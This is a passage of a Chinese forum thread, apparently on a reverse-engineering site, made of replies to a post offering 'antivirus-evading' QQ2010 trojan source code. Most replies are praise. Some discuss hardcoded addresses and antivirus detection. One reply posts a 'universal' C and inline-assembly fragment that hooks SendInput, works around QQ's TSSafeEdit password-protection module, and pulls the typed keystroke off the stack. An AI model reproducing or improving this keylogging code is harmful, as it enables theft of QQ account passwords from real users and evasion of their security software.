首页
社区
课程
招聘
[旧帖] [原创]刚写完的QQ2010木马源码,绝对免杀(以加上讲解) 0.00雪花
发表于: 2010-11-1 17:45 12328

[旧帖] [原创]刚写完的QQ2010木马源码,绝对免杀(以加上讲解) 0.00雪花

2010-11-1 17:45
12328
收藏
免费 0
支持
分享
最新回复 (146)
雪    币: 14
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
76
谢谢你的分享哦!
2010-11-2 18:47
0
雪    币: 75
活跃值: (30)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
77
哇    是VC写的吧     不错啊  强大  呵呵
2010-11-2 18:47
0
雪    币: 20
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
78
代码只对WIN7系统有效,XP暂不支持
2010-11-2 19:03
0
雪    币: 30
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
79
LZ 稍后 给我买个 邀请码
2010-11-2 22:18
0
雪    币: 677
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
80
这东西开源 不和谐吧
2010-11-2 23:08
0
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
81
虽然看不懂,但是支持楼主的原创和无私的精神
2010-11-3 01:13
0
雪    币: 440
活跃值: (119)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
82
如果快速方法没有找到,搜索整个盘会使硬盘狂转的,一下就被发现了。。。为啥不查找注册表呢?
2010-11-3 10:43
0
雪    币: 119
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
83
还热乎着呢~~~~~
2010-11-3 10:56
0
雪    币: 119
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
84
正是时候,还热乎着呢~~~~~
2010-11-3 10:56
0
雪    币: 42
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
cec
85
楼主XP的有了吗?
2010-11-3 11:13
0
雪    币: 298
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
86
盲目顶贴者路过。。。
2010-11-3 11:45
0
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
87
强人
2010-11-3 11:48
0
雪    币: 7
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
88
这个比较有兴趣,看看!
2010-11-3 11:57
0
雪    币: 65
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
89
这个是用C写的。漠视win32汇编
2010-11-3 12:17
0
雪    币: 440
活跃值: (119)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
90
我测试的win7版,TSSafeEd返回地址不同:0012FA20  |01CB70D5  返回到 TSSafeEd.01CB70D5 来自 TSSafeEd.01CB7C9C;保存输入字符的栈地址不同:0012FAB0  |00000041;硬编码地址,不靠谱呀~~~
2010-11-3 12:52
0
雪    币: 163
活跃值: (75)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
91
看到红头文字。。先不管三七二十一来回复一下。。开源是好事。。顶!!!!!!!
2010-11-3 13:13
0
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
92
他的高地址要变,低地址位始终没变过,我测试了几天的.结果,都是高地址变了,低地址始终是那个。
2010-11-3 13:54
0
雪    币: 440
活跃值: (119)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
93
搞了一个通用版的,测试了win7和xp sp3
	DWORD nRetAddress=0;
	static DWORD dwTSSafeEdit=(DWORD)GetModuleHandle(TEXT("TSSafeEdit.dat"));
	_asm
	{
		push eax
		mov eax,0
		mov eax,[ebp+4]
		mov nRetAddress,eax
		pop eax
	}
	UINT nRet=0;
	HookOff();
	nRet=SendInput(nInputs,pInputs,cbSize);
	HookOn();

	if(nRetAddress-dwTSSafeEdit>0x16000||nRetAddress<dwTSSafeEdit)//返回地址不在TSSafeEdit中
	{
		char key=0;
		_asm
		{
			push eax
			push ebx
			mov eax,0
			mov ebx,[ebp+0x44]//[ebp+0x44]存放的是字符指针
			mov al,[ebx]
			mov key,al
			pop ebx
			pop eax
		}
2010-11-3 14:08
0
雪    币: 117
活跃值: (102)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
94
360报毒了
2010-11-3 14:46
0
雪    币: 20
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
95
厉害!通用版地址代码确实好使!
2010-11-3 14:49
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
96
不管怎样,开源的是要支持的,来学习一下!
2010-11-3 15:06
0
雪    币: 30
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
97
哇。。临时会员也可以发言了。嘻嘻。顶lz一个
2010-11-3 15:09
0
雪    币: 362
活跃值: (15)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
98
我也来蹭个热闹!!!!!!
2010-11-3 16:02
0
雪    币: 197
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
99
虽然不懂~但是感觉lz很强~
2010-11-3 16:48
0
雪    币: 23
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
100
360杀的是寂寞…
2010-11-3 16:52
0
游客
登录 | 注册 方可回帖
返回
//